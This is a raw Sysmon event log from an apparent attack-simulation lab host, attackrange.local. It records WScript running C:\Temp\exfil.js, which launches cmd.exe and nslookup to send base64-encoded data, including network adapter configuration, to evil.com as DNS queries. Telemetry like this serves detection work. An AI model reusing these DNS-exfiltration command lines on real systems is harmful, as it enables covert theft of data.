14:21:57.712{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.712{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1947-000000005F02}7620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.712{2E1864BB-1905-629A-1747-000000005F02}76087752C:\Windows\system32\cmd.exe{2E1864BB-1905-629A-1947-000000005F02}7620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.716{2E1864BB-1905-629A-1947-000000005F02}7620C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1905-629A-1747-000000005F02}7608C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrhx.tmp 2>&1 354300x8000000000000000217608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.250{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51494- 354300x8000000000000000217607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.250{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51494- 354300x8000000000000000217606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.250{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51493- 354300x8000000000000000217605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.250{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51493- 354300x8000000000000000217604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.250{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51492- 354300x8000000000000000217603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.250{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51492- 354300x8000000000000000217602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.180{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51491- 354300x8000000000000000217601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.180{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51491- 354300x8000000000000000217600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.180{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51490- 354300x8000000000000000217599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.180{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51490- 354300x8000000000000000217598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.180{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51489- 354300x8000000000000000217597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.179{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51489- 354300x8000000000000000217596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.105{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51488- 354300x8000000000000000217595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.105{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51488- 354300x8000000000000000217594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.104{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51487- 354300x8000000000000000217593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.104{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51487- 354300x8000000000000000217592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.104{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51486- 354300x8000000000000000217591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.104{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51486- 354300x8000000000000000217590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.104{00000000-0000-0000-0000-000000000000}3596<unknown process>-udptruefalse127.0.0.1-51486-false127.0.0.1-53domain 10341000x8000000000000000217589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.675{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-1847-000000005F02}4812C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.675{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-1847-000000005F02}4812C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.675{2E1864BB-1905-629A-1847-000000005F02}48125688C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-1747-000000005F02}7608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.659{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1847-000000005F02}4812C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.659{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.659{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.659{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.659{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.659{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1747-000000005F02}7608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.644{2E1864BB-18E0-629A-6742-000000005F02}39763864C:\Windows\System32\WScript.exe{2E1864BB-1905-629A-1747-000000005F02}7608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.659{2E1864BB-1905-629A-1747-000000005F02}7608C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrhx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.644{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltdioj.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.628{2E1864BB-1905-629A-1547-000000005F02}7988508C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-1647-000000005F02}1804C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.612{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1647-000000005F02}1804C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.612{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.612{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.612{2E1864BB-1905-629A-1447-000000005F02}55927548C:\Windows\system32\cmd.exe{2E1864BB-1905-629A-1647-000000005F02}1804C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.627{2E1864BB-1905-629A-1647-000000005F02}1804C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1905-629A-1447-000000005F02}5592C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltdioj.tmp 2>&1 10341000x8000000000000000217569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.591{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-1547-000000005F02}7988C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.591{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-1547-000000005F02}7988C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 